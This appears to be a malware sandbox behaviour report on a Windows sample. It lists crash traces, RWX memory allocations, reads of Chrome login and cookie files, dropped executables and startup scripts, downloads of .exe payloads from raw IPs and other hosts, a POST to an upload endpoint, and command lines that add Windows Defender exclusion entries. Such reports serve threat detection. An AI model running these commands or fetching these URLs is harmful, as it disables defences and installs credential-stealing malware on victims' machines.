__exception__ Aug. 17, 2024, 10:12 p.m.	stacktrace: RtlCreateHeap+0x809 _aullrem-0x3e ntdll+0x40a52 @ 0x778e0a52 RtlpQueryDefaultUILanguage+0x26f _strnicmp-0x186 ntdll+0x5c0f6 @ 0x778fc0f6 RtlFormatCurrentUserKeyPath+0x55c RtlQueryInformationActivationContext-0x2eb ntdll+0x3b69d @ 0x778db69d RtlImageNtHeader+0xb6a RtlDeleteCriticalSection-0x927 ntdll+0x33cce @ 0x778d3cce malloc+0x57 _finite-0xac msvcrt+0x9d45 @ 0x76b29d45 strcpy_s+0x5f _ismbblead-0x34 msvcrt+0xf5d3 @ 0x76b2f5d3 _ftol2_sse_excpt+0x159e3 __STRINGTOLD-0x97b7 msvcrt+0x4779e @ 0x76b6779e main+0x3f899f acfyonjqgqhfmgmkng1gznmy+0x46cddb @ 0x86cddb RtlKnownExceptionFilter+0xb7 EtwEventWriteNoRegistration-0x49 ntdll+0x721d7 @ 0x779121d7 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 42 04 89 55 f0 3b d0 0f 84 32 9a 00 00 8b 57 exception.symbol: LdrUnlockLoaderLock+0x4a0 RtlInitUnicodeStringEx-0xc97 ntdll+0x370dc exception.instruction: mov eax, dword ptr [edx + 4] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 225500 exception.address: 0x778d70dc registers.esp: 2682728 registers.edi: 18153472 registers.eax: 18179552 registers.ebp: 2682772 registers.edx: 1662448044 registers.ebx: 18179572 registers.esi: 63176768 registers.ecx: 2387249036	1

Time & API

Arguments

Status

Return

Repeated

__exception__

Aug. 17, 2024, 10:12 p.m.

stacktrace:

memmove+0x1b1 _unlock-0x422 msvcrt+0xa00b @ 0x76b2a00b
main+0x30918c acfyonjqgqhfmgmkng1gznmy+0x37d5c8 @ 0x77d5c8
main+0x313f10 acfyonjqgqhfmgmkng1gznmy+0x38834c @ 0x78834c
main-0x640ca acfyonjqgqhfmgmkng1gznmy+0x10372 @ 0x410372
main+0x3ac2aa acfyonjqgqhfmgmkng1gznmy+0x4206e6 @ 0x8206e6
main+0x3982c0 acfyonjqgqhfmgmkng1gznmy+0x40c6fc @ 0x80c6fc
main+0x2f3231 acfyonjqgqhfmgmkng1gznmy+0x36766d @ 0x76766d
main-0x730a6 acfyonjqgqhfmgmkng1gznmy+0x1396 @ 0x401396
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 66 0f 7f 6f 50 66 0f 7f 77 60 66 0f 7f 7f 70 8d
exception.symbol: memmove+0x22d _unlock-0x3a6 msvcrt+0xa087
exception.address: 0x76b2a087
exception.module: msvcrt.dll
exception.exception_code: 0xc0000005
exception.offset: 41095
registers.esp: 2685360
registers.edi: 18198448
registers.eax: 18158640
registers.ebp: 2685368
registers.edx: 0
registers.ebx: 12159200
registers.esi: 12199008
registers.ecx: 346

__exception__

Aug. 17, 2024, 10:12 p.m.

stacktrace:

RtlpNtEnumerateSubKey+0x2aeb isupper-0x4d6b ntdll+0xcf619 @ 0x7796f619
RtlpNtEnumerateSubKey+0x2d74 isupper-0x4ae2 ntdll+0xcf8a2 @ 0x7796f8a2
RtlUlonglongByteSwap+0xdacb RtlFreeOemString-0x13e0f ntdll+0x8aebb @ 0x7792aebb
RtlImageNtHeader+0xb6a RtlDeleteCriticalSection-0x927 ntdll+0x33cce @ 0x778d3cce
malloc+0x57 _finite-0xac msvcrt+0x9d45 @ 0x76b29d45
strcpy_s+0x5f _ismbblead-0x34 msvcrt+0xf5d3 @ 0x76b2f5d3
_ftol2_sse_excpt+0x159e3 __STRINGTOLD-0x97b7 msvcrt+0x4779e @ 0x76b6779e
main+0x3f899f acfyonjqgqhfmgmkng1gznmy+0x46cddb @ 0x86cddb
RtlKnownExceptionFilter+0xb7 EtwEventWriteNoRegistration-0x49 ntdll+0x721d7 @ 0x779121d7
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 5e 10 8b 46 14 03 c3 3b 45 0c 73 08 3b 45 fc
exception.symbol: RtlpNtEnumerateSubKey+0x1ec1 isupper-0x5995 ntdll+0xce9ef
exception.instruction: mov ebx, dword ptr [esi + 0x10]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 846319
exception.address: 0x7796e9ef
registers.esp: 2682712
registers.edi: 18153528
registers.eax: 1878234100
registers.ebp: 2682732
registers.edx: 407373464
registers.ebx: 0
registers.esi: 407373456
registers.ecx: 18153472

__exception__

Aug. 17, 2024, 10:12 p.m.

stacktrace:

RtlCreateHeap+0x809 _aullrem-0x3e ntdll+0x40a52 @ 0x778e0a52
RtlpQueryDefaultUILanguage+0x26f _strnicmp-0x186 ntdll+0x5c0f6 @ 0x778fc0f6
RtlFormatCurrentUserKeyPath+0x55c RtlQueryInformationActivationContext-0x2eb ntdll+0x3b69d @ 0x778db69d
RtlImageNtHeader+0xb6a RtlDeleteCriticalSection-0x927 ntdll+0x33cce @ 0x778d3cce
malloc+0x57 _finite-0xac msvcrt+0x9d45 @ 0x76b29d45
strcpy_s+0x5f _ismbblead-0x34 msvcrt+0xf5d3 @ 0x76b2f5d3
_ftol2_sse_excpt+0x159e3 __STRINGTOLD-0x97b7 msvcrt+0x4779e @ 0x76b6779e
main+0x3f899f acfyonjqgqhfmgmkng1gznmy+0x46cddb @ 0x86cddb
RtlKnownExceptionFilter+0xb7 EtwEventWriteNoRegistration-0x49 ntdll+0x721d7 @ 0x779121d7
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 42 04 89 55 f0 3b d0 0f 84 32 9a 00 00 8b 57
exception.symbol: LdrUnlockLoaderLock+0x4a0 RtlInitUnicodeStringEx-0xc97 ntdll+0x370dc
exception.instruction: mov eax, dword ptr [edx + 4]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 225500
exception.address: 0x778d70dc
registers.esp: 2682728
registers.edi: 18153472
registers.eax: 18179552
registers.ebp: 2682772
registers.edx: 1662448044
registers.ebx: 18179572
registers.esi: 63176768
registers.ecx: 2387249036

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (8 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://91.121.59.207/Files/Channel1.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://194.58.114.223/d/385104
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://91.121.59.207/Files/6ec431703915b7c3a66be6ef8e2bf8f9.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://58yongzhe.com/parts/setup1.exe
suspicious_features	POST method with no referer header	suspicious_request	POST http://tvezx20pt.top/v1/upload.php
suspicious_features	GET method with no useragent header	suspicious_request	GET https://pastebin.com/raw/E0rY26ni
suspicious_features	GET method with no useragent header	suspicious_request	GET https://yip.su/RNWPd.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://cdn.discordapp.com/attachments/1272578305203110022/1274336696627892317/setup.exe?ex=66c1e208&is=66c09088&hm=d301fab09c009c8ddf7bbdaccf84e9e284b1d644909338534cae1eab5b7ee0ef&

Performs some HTTP requests (8 events)

request	GET http://91.121.59.207/Files/Channel1.exe
request	GET http://194.58.114.223/d/385104
request	GET http://91.121.59.207/Files/6ec431703915b7c3a66be6ef8e2bf8f9.exe
request	GET http://58yongzhe.com/parts/setup1.exe
request	POST http://tvezx20pt.top/v1/upload.php
request	GET https://pastebin.com/raw/E0rY26ni
request	GET https://yip.su/RNWPd.exe
request	GET https://cdn.discordapp.com/attachments/1272578305203110022/1274336696627892317/setup.exe?ex=66c1e208&is=66c09088&hm=d301fab09c009c8ddf7bbdaccf84e9e284b1d644909338534cae1eab5b7ee0ef&

Sends data using the HTTP POST Method (1 event)

request

POST http://tvezx20pt.top/v1/upload.php

Resolves a suspicious Top Level Domain (TLD) (2 events)

domain	yip.su				description	Soviet Union domain TLD
domain	tvezx20pt.top				description	Generic top level domain TLD

Allocates read-write-execute memory (usually to unpack itself) (50 out of 235 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 1048576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000690000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000710000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c8b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 1507328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000ab0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000ba0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35f4000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e6a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f1c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f46000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e7c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e8b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e6b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ebc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e8d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93fd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e62000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e7a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ebd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e6c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93fd1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e7b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93fe0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93fe1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93fe2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93fe3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93fe4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 17, 2024, 10:04 p.m.	process_identifier: 1880 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93fe5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Steals private information from local Internet browsers (4 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies

Creates executable files on the filesystem (16 events)

file	C:\Users\test22\Pictures\bY1WXV8eleObWNCtpR7Kl9vV.exe
file	C:\Users\test22\Pictures\vgdyfc1VcBsqmc2SsNuc62Y1.exe
file	C:\Users\test22\AppData\Local\Temp\7zSAEE3.tmp\Install.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CTmGnZQw0rXprS4H71WQdxSN.bat
file	C:\Users\test22\AppData\Local\AifQv9TpJ5Dy29odoDQQZg7B.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4Ros4JuAPsw2Ks71Cb0ofjym.bat
file	C:\Users\test22\AppData\Local\4OEqWH3hDrzeNsObqsYfQVGW.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFmeQ7Y2qNuXg7CJhoe0Mf5q.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AOgSI6AiHrwEcKm36yPe6WQ7.bat
file	C:\Users\test22\AppData\Local\Temp\RarSFX0\keygen-step-2.cpl
file	C:\Users\test22\AppData\Local\Temp\RarSFX0\keygen.bat
file	C:\Users\test22\AppData\Local\Temp\7zSA936.tmp\Install.exe
file	C:\Users\test22\AppData\Local\hr9qGOZT8583WUDCVOpNBgcR.exe
file	C:\Users\test22\Pictures\z7sqTTpo7jhmcMDp0blbc6Qe.exe
file	C:\Users\test22\AppData\Local\66wslyB2Hm9itKBJVDsD5Pzg.exe
file	C:\Users\test22\Pictures\acFYONjqGQhfMgmKNG1gZnmY.exe

Creates a shortcut to an executable file (1 event)

file	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (5 events)

cmdline	powershell start-process -WindowStyle Hidden gpupdate.exe /force
cmdline	cmd /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
cmdline	forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
cmdline	"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
cmdline	/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

Drops a binary and executes it (6 events)

file	C:\Users\test22\Pictures\acFYONjqGQhfMgmKNG1gZnmY.exe
file	C:\Users\test22\Pictures\vgdyfc1VcBsqmc2SsNuc62Y1.exe
file	C:\Users\test22\Pictures\z7sqTTpo7jhmcMDp0blbc6Qe.exe
file	C:\Users\test22\Pictures\bY1WXV8eleObWNCtpR7Kl9vV.exe
file	C:\Users\test22\AppData\Local\Temp\RarSFX0\keygen.bat
file	C:\Users\test22\AppData\Local\Temp\RarSFX0\keygen-step-2.cpl

Drops an executable to the user AppData folder (1 event)

